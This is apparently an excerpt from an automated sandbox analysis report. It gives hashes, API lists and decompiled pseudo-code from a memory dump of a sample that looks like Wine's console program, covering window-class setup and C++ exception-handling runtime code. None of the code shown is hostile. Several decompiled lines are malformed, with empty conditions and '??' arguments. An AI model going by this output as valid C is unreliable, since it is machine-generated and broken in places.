    • Opcode Fuzzy Hash: ea3a66fbc2c6f8985ea681114caf609c630cbdb3dd6f19f3c14c1d46ffd311f9
    • Instruction Fuzzy Hash: 57C194B4808304AFD714EF68D54869EBFF0EB44320F10CA6DE8A997395E7749698CF46
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.265490341.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
    • Associated: 00000000.00000002.265486347.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265503610.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265511296.00000000001C4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265516218.00000000001C9000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_1a0000_SecuriteInfo.jbxd
    Similarity
    • API ID: LongTextWindow$ColorObjectPaintSelect$BeginBrushCreateFillHandleItemLoadModuleParentRectSolidString
    • String ID: ASCII: abcXYZ
    • API String ID: 3404974346-732927841
    • Opcode ID: c5676f3195bfa30042fc217d5b725d89c747b30219d48fe798ad5da0efddfb7f
    • Instruction ID: 0a6e0a26c72b065ac17d9d9395f337d44082f2c509bb9e0aecdb4a6f46b83751
    • Opcode Fuzzy Hash: c5676f3195bfa30042fc217d5b725d89c747b30219d48fe798ad5da0efddfb7f
    • Instruction Fuzzy Hash: 376185B58083099FCB04EFA8D58869EBFF0AF49311F00896DE89997355E7349998CF42
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 29%
    			E001AA680(void* __edi, struct HINSTANCE__* _a4, intOrPtr _a8) {
    				intOrPtr _v12;
    				char _v216;
    				char _v428;
    				struct _WNDCLASSW _v468;
    				char _v980;
    				struct HINSTANCE__* _v984;
    				char* _v988;
    				char* _v992;
    				char* _v996;
    				intOrPtr _v1000;
    				void* _v1008;
    				intOrPtr _v1012;
    				struct HINSTANCE__* _v1016;
    				intOrPtr _v1020;
    				char* _v1024;
    				struct HINSTANCE__* _t110;
    				struct HINSTANCE__* _t115;
    				int _t117;
    				intOrPtr* _t118;
    				void* _t155;
    				void* _t156;
    				struct HINSTANCE__** _t165;
    				struct HINSTANCE__** _t166;
    				intOrPtr* _t167;
    				intOrPtr* _t169;
    
    				_t153 = __edi;
    				L001BB0CA();
    				E001AFC30(__edi,  &_v428, 0, 0xd4);
    				_v428 = _a4;
    				if(_a8 == 0) {
    					_v1016 = 0;
    					_v1012 =  &_v428 + 4;
    					E001A3370(_t153);
    					_t156 = _t155 - 8;
    				} else {
    					_v1016 = _a4;
    					_v1012 =  &_v428 + 4;
    					E001AB960();
    					_t156 = _t155 - 8;
    				}
    				E001AF6B0( &_v216,  &_v428 + 4, 0xcc);
    				_v468.style = 0;
    				_v468.lpfnWndProc = E001ABBB0;
    				_v468.cbClsExtra = 0;
    				_v468.cbWndExtra = 4;
    				_v468.hInstance = GetModuleHandleW(0);
    				_v468.hIcon = 0;
    				_v468.hCursor = LoadCursorW(0, 0x7f00);
    				_v468.hbrBackground = GetStockObject(4);
    				_v468.lpszMenuName = 0;
    				_v468.lpszClassName = L"WineConFontPreview";
    				RegisterClassW( &_v468);
    				_v468.style = 0;
    				_v468.lpfnWndProc = E001ABF30;
    				_v468.cbClsExtra = 0;
    				_v468.cbWndExtra = 4;
    				_v468.hInstance = GetModuleHandleW(0);
    				_v468.hIcon = 0;
    				_v468.hCursor = LoadCursorW(0, 0x7f00);
    				_v468.hbrBackground = GetStockObject(4);
    				_v468.lpszMenuName = 0;
    				_v468.lpszClassName = L"WineConColorPreview";
    				RegisterClassW( &_v468);
    				_t110 =  &_v980;
    				_v1024 = _t110;
    				0xffda0000();
    				_t165 = _t156 - 0xffffffffffffffdc;
    				_v984 = _t110;
    				_v988 =  &_v980;
    				_t113 =  !=  ? 0x121 : 0x120;
    				_v992 =  !=  ? 0x121 : 0x120;
    				 *_t165 = 0;
    				_t115 = GetModuleHandleW(??);
    				_t166 = _t165 - 4;
    				 *_t166 = _t115;
    				_v1024 = _v992;
    				_v1020 = _v988;
    				_v1016 = _v984;
    				_t117 = LoadStringW(??, ??, ??, ??);
    				_t167 = _t166 - 0x10;
    				if(_t117 == 0) {
    					 *_t167 =  &_v980;
    					_v1024 = L"Setup";
    					E001B11F7();
    				}
    				_t118 = _t167;
    				 *((intOrPtr*)(_t118 + 4)) =  &_v428 + 4;
    				 *_t118 =  &_v216;
    				 *((intOrPtr*)(_t118 + 8)) = 0xcc;
    				if(E001AE02E() != 0) {
    					if(_a8 != 0) {
    						 *_t167 = _a4;
    						_v1024 =  &_v428 + 4;
    						E001A4AB0();
    						_t169 = _t167 - 8;
    						 *_t169 = _v428;
    						E001A8E70();
    						_t167 = _t169 - 4;
    					}
    					_v996 =  &_v428 + 4;
    					if(_a8 == 0) {
    						_v1000 = 0;
    					} else {
    						_v1000 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x84)) + 0x24));
    					}
    					 *_t167 = _v1000;
    					_v1024 = _v996;
    					E001AC3B0();
    					_v12 = 1;
    				} else {
    					_v12 = 1;
    				}
    				return _v12;
    			}




























    0x001aa680
    0x001aa690
    0x001aa6b0
    0x001aa6b8
    0x001aa6c2
    0x001aa6f3
    0x001aa6fa
    0x001aa6fe
    0x001aa703
    0x001aa6c8
    0x001aa6d4
    0x001aa6d7
    0x001aa6db
    0x001aa6e0
    0x001aa6e0
    0x001aa724
    0x001aa729
    0x001aa739
    0x001aa73f
    0x001aa749
    0x001aa765
    0x001aa76b
    0x001aa790
    0x001aa7a6
    0x001aa7ac
    0x001aa7bc
    0x001aa7cb
    0x001aa7d4
    0x001aa7e4
    0x001aa7ea
    0x001aa7f4
    0x001aa810
    0x001aa816
    0x001aa83b
    0x001aa851
    0x001aa857
    0x001aa867
    0x001aa876
    0x001aa87f
    0x001aa885
    0x001aa888
    0x001aa88d
    0x001aa890
    0x001aa89c
    0x001aa8b2
    0x001aa8b5
    0x001aa8bd
    0x001aa8c4
    0x001aa8ca
    0x001aa8e1
    0x001aa8e4
    0x001aa8e8
    0x001aa8ec
    0x001aa8f0
    0x001aa8f6
    0x001aa8fc
    0x001aa90e
    0x001aa911
    0x001aa915
    0x001aa915
    0x001aa929
    0x001aa92b
    0x001aa92e
    0x001aa930
    0x001aa93f
    0x001aa955
    0x001aa967
    0x001aa96a
    0x001aa96e
    0x001aa973
    0x001aa97c
    0x001aa97f
    0x001aa984
    0x001aa984
    0x001aa990
    0x001aa99a
    0x001aa9b9
    0x001aa9a0
    0x001aa9ac
    0x001aa9ac
    0x001aa9d0
    0x001aa9d3
    0x001aa9d7
    0x001aa9df
    0x001aa945
    0x001aa945
    0x001aa945
    0x001aa9f1

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.265490341.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
    • Associated: 00000000.00000002.265486347.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265503610.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265511296.00000000001C4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265516218.00000000001C9000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_1a0000_SecuriteInfo.jbxd
    Similarity
    • API ID: HandleLoadModule$ClassCursorObjectRegisterStock$StringVisibleWindow
    • String ID: Setup$WineConColorPreview$WineConFontPreview
    • API String ID: 3977189380-2851978119
    • Opcode ID: be61406b171a175101bd2fb2031fe5d17bd97c0e96294c3d1dd931e158c4870f
    • Instruction ID: b1ccf8808d7bc5c2d98b3b4e80c37fc9a22d525ee46578e8da04d382df356253
    • Opcode Fuzzy Hash: be61406b171a175101bd2fb2031fe5d17bd97c0e96294c3d1dd931e158c4870f
    • Instruction Fuzzy Hash: F291E8B49052189FEB54EF68D94879DBBF4BF05304F0085AEE889E7341E7749A88CF42
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • CreateEventW.KERNEL32 ref: 001A7BAE
    • EnterCriticalSection.KERNEL32 ref: 001A7C7A
    • MultiByteToWideChar.KERNEL32 ref: 001A7D09
    • LeaveCriticalSection.KERNEL32 ref: 001A7DBD
    • LeaveCriticalSection.KERNEL32 ref: 001A7F5A
    • EnterCriticalSection.KERNEL32 ref: 001A7F76
    • CloseHandle.KERNEL32 ref: 001A800E
    • LeaveCriticalSection.KERNEL32 ref: 001A802D
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.265490341.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
    • Associated: 00000000.00000002.265486347.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265503610.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265511296.00000000001C4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265516218.00000000001C9000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_1a0000_SecuriteInfo.jbxd
    Similarity
    • API ID: CriticalSection$Leave$Enter$ByteCharCloseCreateEventHandleMultiWide
    • String ID: H$input restore failed: %#lx$input setup failed: %#lx
    • API String ID: 628538822-1542851097
    • Opcode ID: 632e395688c22a40728f26e9b727e0439433b78c73d13b021a202ab7ed6ef868
    • Instruction ID: 62f3913f1a588760b0e3dea54aa0e6c6342c68bf68cc6e9b4d2ce8dff01589d9
    • Opcode Fuzzy Hash: 632e395688c22a40728f26e9b727e0439433b78c73d13b021a202ab7ed6ef868
    • Instruction Fuzzy Hash: 1FD12AB4809215CFDB15EF68C9587AEBBF4BF49310F0189ADE49997280D7349B88CF52
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.265490341.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
    • Associated: 00000000.00000002.265486347.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265503610.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265511296.00000000001C4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265516218.00000000001C9000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_1a0000_SecuriteInfo.jbxd
    Similarity
    • API ID: Info$CharsetStartupTranslate
    • String ID: WineConsoleClass
    • API String ID: 3822699805-3427835368
    • Opcode ID: 924e80dceb699dd5b5de3f17383b7ae77f1c0c77f5dc2840dd9e9454cd5e6b18
    • Instruction ID: 931e9c8942a32d28285cd532294b3c7feebe3f4e9b0180c85d2308d38cdb86c0
    • Opcode Fuzzy Hash: 924e80dceb699dd5b5de3f17383b7ae77f1c0c77f5dc2840dd9e9454cd5e6b18
    • Instruction Fuzzy Hash: 1B91D7B49042199FDB14DF68C998BADBBF0FF09304F0185A9E889EB351DB759A84CF41
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.265490341.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
    • Associated: 00000000.00000002.265486347.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265503610.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265511296.00000000001C4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265516218.00000000001C9000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_1a0000_SecuriteInfo.jbxd
    Similarity
    • API ID: Object$DeleteReleaseSelectText$CreateFaceFontIndirectInfoMetrics
    • String ID:
    • API String ID: 2170087643-0
    • Opcode ID: eb4e933d5cb20131311116cbe32ad9572f071e12f3db2b9f5b8319cc17a2d441
    • Instruction ID: 3f52abf43c36f91c01b6279cc204a8132080206eb984ec45e385b3e6b388f1cb
    • Opcode Fuzzy Hash: eb4e933d5cb20131311116cbe32ad9572f071e12f3db2b9f5b8319cc17a2d441
    • Instruction Fuzzy Hash: 5CB16178A042089FCB14DF68D588BADBBF1FF49314F1584A9E899DB361D734EA84CB41
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 64%
    			E001B7A82(signed int __edx, intOrPtr* _a4, signed int _a8, signed int _a12, intOrPtr _a16, signed int* _a20, signed int _a24, signed int _a28, signed int _a32, signed int _a36) {
    				intOrPtr _v0;
    				signed int _v8;
    				signed int _v12;
    				signed int _v16;
    				signed int _v20;
    				signed int _v24;
    				char _v28;
    				signed int _v32;
    				signed int _v36;
    				signed int _v40;
    				intOrPtr* _v44;
    				intOrPtr _v48;
    				signed int* _v52;
    				intOrPtr _v56;
    				signed int _v64;
    				void* _v68;
    				char _v84;
    				signed int _v88;
    				signed int _v92;
    				intOrPtr _v100;
    				void _v104;
    				signed int _v108;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				void* __ebp;
    				signed int _t146;
    				signed int _t152;
    				void* _t155;
    				signed char _t160;
    				signed int _t161;
    				void* _t163;
    				void* _t166;
    				void* _t169;
    				intOrPtr* _t179;
    				void* _t182;
    				intOrPtr* _t183;
    				signed int _t184;
    				signed int _t185;
    				signed int _t187;
    				void* _t191;
    				void* _t196;
    				void* _t197;
    				intOrPtr _t201;
    				intOrPtr* _t202;
    				signed int _t203;
    				signed int _t210;
    				signed int _t211;
    				intOrPtr _t214;
    				signed int* _t218;
    				signed int _t219;
    				signed int _t224;
    				signed int _t225;
    				signed int _t231;
    				void* _t234;
    				void* _t235;
    
    				_t216 = __edx;
    				_t218 = _a20;
    				_v20 = 0;
    				_v28 = 0;
    				_t204 = E001B8C58(_a8, _a16, _t218);
    				_t235 = _t234 + 0xc;
    				_v12 = _t204;
    				if(_t204 < 0xffffffff || _t204 >= _t218[1]) {
    					L67:
    					E001B1BDC(_t202, _t204, _t216, _t218, _t225);
    					asm("int3");
    					__eflags = _v88;
    					_push(_t202);
    					_t203 = _v92;
    					_push(_t225);
    					_push(_t218);
    					_t219 = _v108;
    					if(__eflags != 0) {
    						_push(_a24);
    						_push(_t203);
    						_push(_t219);
    						_push(_v0);
    						E001B79E9(_t203, _t219, _t225, __eflags);
    						_t235 = _t235 + 0x10;
    					}
    					_t146 = _a36;
    					__eflags = _t146;
    					if(_t146 == 0) {
    						_t146 = _t219;
    					}
    					E001B425E(_t204, _t146, _v0);
    					_t226 = _a28;
    					_push( *_a28);
    					_push(_a16);
    					_push(_a12);
    					_push(_t219);
    					E001B7232(_t203, _t204, _t216, _t219, _a28, __eflags);
    					E001B8C75(_t219, _a16,  *((intOrPtr*)(_t226 + 4)) + 1);
    					_push(0x100);
    					_push(_a32);
    					_push( *((intOrPtr*)(_t203 + 0xc)));
    					_push(_a16);
    					_push(_a8);
    					_push(_t219);
    					_push(_v0);
    					_t152 = E001B7429(_t203, _t216, _t219, _t226, __eflags);
    					__eflags = _t152;
    					if(_t152 != 0) {
    						E001B422E(_t152, _t219);
    						return _t152;
    					}
    					return _t152;
    				} else {
    					_t202 = _a4;
    					if( *_t202 != 0xe06d7363 ||  *((intOrPtr*)(_t202 + 0x10)) != 3 ||  *((intOrPtr*)(_t202 + 0x14)) != 0x19930520 &&  *((intOrPtr*)(_t202 + 0x14)) != 0x19930521 &&  *((intOrPtr*)(_t202 + 0x14)) != 0x19930522) {
    						L22:
    						_t216 = _a12;
    						_v8 = _a12;
    						goto L24;
    					} else {
    						_t225 = 0;
    						if( *((intOrPtr*)(_t202 + 0x1c)) != 0) {
    							goto L22;
    						} else {
    							_t155 = E001B1C6E(_t202, _t204, _t216, _t218, 0);
    							if( *((intOrPtr*)(_t155 + 0x10)) == 0) {
    								L61:
    								return _t155;
    							} else {
    								_t202 =  *((intOrPtr*)(E001B1C6E(_t202, _t204, _t216, _t218, 0) + 0x10));
    								_t191 = E001B1C6E(_t202, _t204, _t216, _t218, 0);
    								_v28 = 1;
    								_v8 =  *((intOrPtr*)(_t191 + 0x14));
    								if(_t202 == 0 ||  *_t202 == 0xe06d7363 &&  *((intOrPtr*)(_t202 + 0x10)) == 3 && ( *((intOrPtr*)(_t202 + 0x14)) == 0x19930520 ||  *((intOrPtr*)(_t202 + 0x14)) == 0x19930521 ||  *((intOrPtr*)(_t202 + 0x14)) == 0x19930522) &&  *((intOrPtr*)(_t202 + 0x1c)) == _t225) {
    									goto L67;
    								} else {
    									if( *((intOrPtr*)(E001B1C6E(_t202, _t204, _t216, _t218, _t225) + 0x1c)) == _t225) {
    										L23:
    										_t216 = _v8;
    										_t204 = _v12;
    										L24:
    										_v52 = _t218;
    										_v48 = 0;
    										__eflags =  *_t202 - 0xe06d7363;
    										if( *_t202 != 0xe06d7363) {
    											L57:
    											__eflags = _t218[3];
    											if(_t218[3] <= 0) {
    												goto L60;
    											} else {
    												__eflags = _a24;
    												if(_a24 != 0) {
    													goto L67;
    												} else {
    													E001B7EA7(_t204, _t216, _t218, _t225, _t202, _a8, _t216, _a16, _t218, _t204, _a28, _a32);
    													_t235 = _t235 + 0x20;
    													goto L60;
    												}
    											}
    										} else {
    											__eflags =  *((intOrPtr*)(_t202 + 0x10)) - 3;
    											if( *((intOrPtr*)(_t202 + 0x10)) != 3) {
    												goto L57;
    											} else {
    												__eflags =  *((intOrPtr*)(_t202 + 0x14)) - 0x19930520;
    												if( *((intOrPtr*)(_t202 + 0x14)) == 0x19930520) {
    													L29:
    													_t225 = _a32;
    													__eflags = _t218[3];
    													if(_t218[3] > 0) {
    														E001B41BE(_t204,  &_v68,  &_v52, _t204, _a16, _t218, _a28);
    														_t216 = _v64;
    														_t235 = _t235 + 0x18;
    														_t179 = _v68;
    														_v44 = _t179;
    														_v16 = _t216;
    														__eflags = _t216 - _v56;
    														if(_t216 < _v56) {
    															_t210 = _t216 * 0x14;
    															__eflags = _t210;
    															_v32 = _t210;
    															do {
    																_t211 = 5;
    																_t182 = memcpy( &_v104,  *((intOrPtr*)( *_t179 + 0x10)) + _t210, _t211 << 2);
    																_t235 = _t235 + 0xc;
    																__eflags = _v104 - _t182;
    																if(_v104 <= _t182) {
    																	__eflags = _t182 - _v100;
    																	if(_t182 <= _v100) {
    																		_t214 = 0;
    																		_v20 = 0;
    																		__eflags = _v92;
    																		if(_v92 != 0) {
    																			_t217 =  *((intOrPtr*)(_t202 + 0x1c));
    																			_t183 =  *((intOrPtr*)( *((intOrPtr*)(_t202 + 0x1c)) + 0xc));
    																			_t184 = _t183 + 4;
    																			__eflags = _t184;
    																			_v36 = _t184;
    																			_t185 = _v88;
    																			_v40 =  *_t183;
    																			_v24 = _t185;
    																			do {
    																				asm("movsd");
    																				asm("movsd");
    																				asm("movsd");
    																				asm("movsd");
    																				_t231 = _v40;
    																				_t224 = _v36;
    																				__eflags = _t231;
    																				if(_t231 <= 0) {
    																					goto L40;
    																				} else {
    																					while(1) {
    																						_t187 = E001B781D( &_v84,  *_t224, _t217);
    																						_t235 = _t235 + 0xc;
    																						__eflags = _t187;
    																						if(_t187 != 0) {
    																							break;
    																						}
    																						_t217 =  *((intOrPtr*)(_t202 + 0x1c));
    																						_t231 = _t231 - 1;
    																						_t224 = _t224 + 4;
    																						__eflags = _t231;
    																						if(_t231 > 0) {
    																							continue;
    																						} else {
    																							_t214 = _v20;
    																							_t185 = _v24;
    																							goto L40;
    																						}
    																						goto L43;
    																					}
    																					_push(_a24);
    																					_push(_v28);
    																					_push(_a32);
    																					_push(_a28);
    																					_push( &_v104);
    																					_push( *_t224);
    																					_push( &_v84);
    																					_push(_a20);
    																					_push(_a16);
    																					_push(_v8);
    																					_push(_a8);
    																					_push(_t202);
    																					L68();
    																					_t235 = _t235 + 0x30;
    																				}
    																				L43:
    																				_t216 = _v16;
    																				goto L44;
    																				L40:
    																				_t214 = _t214 + 1;
    																				_t185 = _t185 + 0x10;
    																				_v20 = _t214;
    																				_v24 = _t185;
    																				__eflags = _t214 - _v92;
    																			} while (_t214 != _v92);
    																			goto L43;
    																		}
    																	}
    																}
    																L44:
    																_t216 = _t216 + 1;
    																_t179 = _v44;
    																_t210 = _v32 + 0x14;
    																_v16 = _t216;
    																_v32 = _t210;
    																__eflags = _t216 - _v56;
    															} while (_t216 < _v56);
    															_t218 = _a20;
    															_t225 = _a32;
    														}
    													}
    													__eflags = _a24;
    													if(__eflags != 0) {
    														_push(1);
    														E001ADC55(_t202, _t218, _t225, __eflags);
    														_t204 = _t202;
    													}
    													__eflags = ( *_t218 & 0x1fffffff) - 0x19930521;
    													if(( *_t218 & 0x1fffffff) < 0x19930521) {
    														L60:
    														_t155 = E001B1C6E(_t202, _t204, _t216, _t218, _t225);
    														__eflags =  *(_t155 + 0x1c);
    														if( *(_t155 + 0x1c) != 0) {
    															goto L67;
    														} else {
    															goto L61;
    														}
    													} else {
    														_t160 = _t218[8] >> 2;
    														__eflags = _t218[7];
    														if(_t218[7] != 0) {
    															__eflags = _t160 & 0x00000001;
    															if((_t160 & 0x00000001) == 0) {
    																_push(_t218[7]);
    																_t161 = E001B7642();
    																_t204 = _t202;
    																__eflags = _t161;
    																if(_t161 == 0) {
    																	goto L64;
    																} else {
    																	goto L60;
    																}
    															} else {
    																goto L54;
    															}
    														} else {
    															__eflags = _t160 & 0x00000001;
    															if((_t160 & 0x00000001) == 0) {
    																goto L60;
    															} else {
    																__eflags = _a28;
    																if(_a28 != 0) {
    																	goto L60;
    																} else {
    																	L54:
    																	 *((intOrPtr*)(E001B1C6E(_t202, _t204, _t216, _t218, _t225) + 0x10)) = _t202;
    																	_t169 = E001B1C6E(_t202, _t204, _t216, _t218, _t225);
    																	_t206 = _v8;
    																	 *((intOrPtr*)(_t169 + 0x14)) = _v8;
    																	goto L62;
    																}
    															}
    														}
    													}
    												} else {
    													__eflags =  *((intOrPtr*)(_t202 + 0x14)) - 0x19930521;
    													if( *((intOrPtr*)(_t202 + 0x14)) == 0x19930521) {
    														goto L29;
    													} else {
    														__eflags =  *((intOrPtr*)(_t202 + 0x14)) - 0x19930522;
    														if( *((intOrPtr*)(_t202 + 0x14)) != 0x19930522) {
    															goto L57;
    														} else {
    															goto L29;
    														}
    													}
    												}
    											}
    										}
    									} else {
    										_v16 =  *((intOrPtr*)(E001B1C6E(_t202, _t204, _t216, _t218, _t225) + 0x1c));
    										_t196 = E001B1C6E(_t202, _t204, _t216, _t218, _t225);
    										_push(_v16);
    										 *(_t196 + 0x1c) = _t225;
    										_t197 = E001B7642();
    										_t206 = _t202;
    										if(_t197 != 0) {
    											goto L23;
    										} else {
    											_t218 = _v16;
    											_t255 =  *_t218 - _t225;
    											if( *_t218 <= _t225) {
    												L62:
    												E001B117B(_t202, _t206, _t216, _t218, _t225, __eflags);
    											} else {
    												while(1) {
    													_t206 =  *((intOrPtr*)(_t225 + _t218[1] + 4));
    													if(E001B740A( *((intOrPtr*)(_t225 + _t218[1] + 4)), _t255, 0x1c48c0) != 0) {
    														goto L63;
    													}
    													_t225 = _t225 + 0x10;
    													_t201 = _v20 + 1;
    													_v20 = _t201;
    													_t255 = _t201 -  *_t218;
    													if(_t201 >=  *_t218) {
    														goto L62;
    													} else {
    														continue;
    													}
    													goto L63;
    												}
    											}
    											L63:
    											_push(1);
    											_push(_t202);
    											E001ADC55(_t202, _t218, _t225, __eflags);
    											_t204 =  &_v64;
    											E001B73C6( &_v64);
    											E001B8D05( &_v64, 0x1c328c);
    											L64:
    											 *((intOrPtr*)(E001B1C6E(_t202, _t204, _t216, _t218, _t225) + 0x10)) = _t202;
    											_t163 = E001B1C6E(_t202, _t204, _t216, _t218, _t225);
    											_t204 = _v8;
    											 *(_t163 + 0x14) = _v8;
    											__eflags = _t225;
    											if(_t225 == 0) {
    												_t225 = _a8;
    											}
    											E001B425E(_t204, _t225, _t202);
    											L001B731A(_a8, _a16, _t218);
    											_t166 = E001B7332(_t218);
    											_t235 = _t235 + 0x10;
    											_push(_t166);
    											E001B76DC(_t202, _t204, _t216, _t218, _t225, __eflags);
    											goto L67;
    										}
    									}
    								}
    							}
    						}
    					}
    				}
    			}



























































    0x001b7a82
    0x001b7a8b
    0x001b7a94
    0x001b7a9a
    0x001b7aa2
    0x001b7aa4
    0x001b7aa7
    0x001b7aad
    0x001b7e21
    0x001b7e21
    0x001b7e26
    0x001b7e2a
    0x001b7e2e
    0x001b7e2f
    0x001b7e32
    0x001b7e33
    0x001b7e34
    0x001b7e37
    0x001b7e39
    0x001b7e3c
    0x001b7e3d
    0x001b7e3e
    0x001b7e41
    0x001b7e46
    0x001b7e46
    0x001b7e49
    0x001b7e4c
    0x001b7e4e
    0x001b7e50
    0x001b7e50
    0x001b7e56
    0x001b7e5b
    0x001b7e5e
    0x001b7e60
    0x001b7e63
    0x001b7e66
    0x001b7e67
    0x001b7e75
    0x001b7e7a
    0x001b7e7f
    0x001b7e82
    0x001b7e85
    0x001b7e88
    0x001b7e8b
    0x001b7e8c
    0x001b7e8f
    0x001b7e97
    0x001b7e99
    0x001b7e9d
    0x00000000
    0x001b7e9d
    0x001b7ea6
    0x001b7abc
    0x001b7abc
    0x001b7ac5
    0x001b7bc2
    0x001b7bc2
    0x001b7bc5
    0x00000000
    0x001b7af4
    0x001b7af4
    0x001b7af9
    0x00000000
    0x001b7aff
    0x001b7aff
    0x001b7b07
    0x001b7dbf
    0x001b7dbf
    0x001b7b0d
    0x001b7b12
    0x001b7b15
    0x001b7b1a
    0x001b7b21
    0x001b7b26
    0x00000000
    0x001b7b5e
    0x001b7b66
    0x001b7bca
    0x001b7bca
    0x001b7bcd
    0x001b7bd0
    0x001b7bd2
    0x001b7bd5
    0x001b7bd8
    0x001b7bde
    0x001b7d8a
    0x001b7d8a
    0x001b7d8d
    0x00000000
    0x001b7d8f
    0x001b7d8f
    0x001b7d92
    0x00000000
    0x001b7d98
    0x001b7da8
    0x001b7dad
    0x00000000
    0x001b7dad
    0x001b7d92
    0x001b7be4
    0x001b7be4
    0x001b7be8
    0x00000000
    0x001b7bee
    0x001b7bee
    0x001b7bf5
    0x001b7c0d
    0x001b7c0d
    0x001b7c10
    0x001b7c13
    0x001b7c29
    0x001b7c2e
    0x001b7c31
    0x001b7c34
    0x001b7c37
    0x001b7c3a
    0x001b7c3d
    0x001b7c40
    0x001b7c46
    0x001b7c46
    0x001b7c49
    0x001b7c4c
    0x001b7c5b
    0x001b7c5c
    0x001b7c5c
    0x001b7c5e
    0x001b7c61
    0x001b7c67
    0x001b7c6a
    0x001b7c70
    0x001b7c72
    0x001b7c75
    0x001b7c78
    0x001b7c7e
    0x001b7c81
    0x001b7c86
    0x001b7c86
    0x001b7c89
    0x001b7c8c
    0x001b7c8f
    0x001b7c92
    0x001b7c95
    0x001b7c9a
    0x001b7c9b
    0x001b7c9c
    0x001b7c9d
    0x001b7c9e
    0x001b7ca1
    0x001b7ca4
    0x001b7ca6
    0x00000000
    0x001b7ca8
    0x001b7ca8
    0x001b7caf
    0x001b7cb4
    0x001b7cb7
    0x001b7cb9
    0x00000000
    0x00000000
    0x001b7cbb
    0x001b7cbe
    0x001b7cbf
    0x001b7cc2
    0x001b7cc4
    0x00000000
    0x001b7cc6
    0x001b7cc6
    0x001b7cc9
    0x00000000
    0x001b7cc9
    0x00000000
    0x001b7cc4
    0x001b7cdd
    0x001b7ce3
    0x001b7ce6
    0x001b7ce9
    0x001b7cec
    0x001b7ced
    0x001b7cf2
    0x001b7cf3
    0x001b7cf6
    0x001b7cf9
    0x001b7cfc
    0x001b7cff
    0x001b7d00
    0x001b7d05
    0x001b7d05
    0x001b7d08
    0x001b7d08
    0x00000000
    0x001b7ccc
    0x001b7ccc
    0x001b7ccd
    0x001b7cd0
    0x001b7cd3
    0x001b7cd6
    0x001b7cd6
    0x00000000
    0x001b7cdb
    0x001b7c78
    0x001b7c6a
    0x001b7d0b
    0x001b7d0e
    0x001b7d0f
    0x001b7d12
    0x001b7d15
    0x001b7d18
    0x001b7d1b
    0x001b7d1b
    0x001b7d24
    0x001b7d27
    0x001b7d27
    0x001b7c40
    0x001b7d2a
    0x001b7d2e
    0x001b7d30
    0x001b7d33
    0x001b7d39
    0x001b7d39
    0x001b7d41
    0x001b7d46
    0x001b7db0
    0x001b7db0
    0x001b7db5
    0x001b7db9
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x001b7d48
    0x001b7d4b
    0x001b7d4e
    0x001b7d52
    0x001b7d60
    0x001b7d62
    0x001b7d79
    0x001b7d7d
    0x001b7d83
    0x001b7d84
    0x001b7d86
    0x00000000
    0x001b7d88
    0x00000000
    0x001b7d88
    0x00000000
    0x00000000
    0x00000000
    0x001b7d54
    0x001b7d54
    0x001b7d56
    0x00000000
    0x001b7d58
    0x001b7d58
    0x001b7d5c
    0x00000000
    0x001b7d5e
    0x001b7d64
    0x001b7d69
    0x001b7d6c
    0x001b7d71
    0x001b7d74
    0x00000000
    0x001b7d74
    0x001b7d5c
    0x001b7d56
    0x001b7d52
    0x001b7bf7
    0x001b7bf7
    0x001b7bfe
    0x00000000
    0x001b7c00
    0x001b7c00
    0x001b7c07
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x001b7c07
    0x001b7bfe
    0x001b7bf5
    0x001b7be8
    0x001b7b68
    0x001b7b70
    0x001b7b73
    0x001b7b78
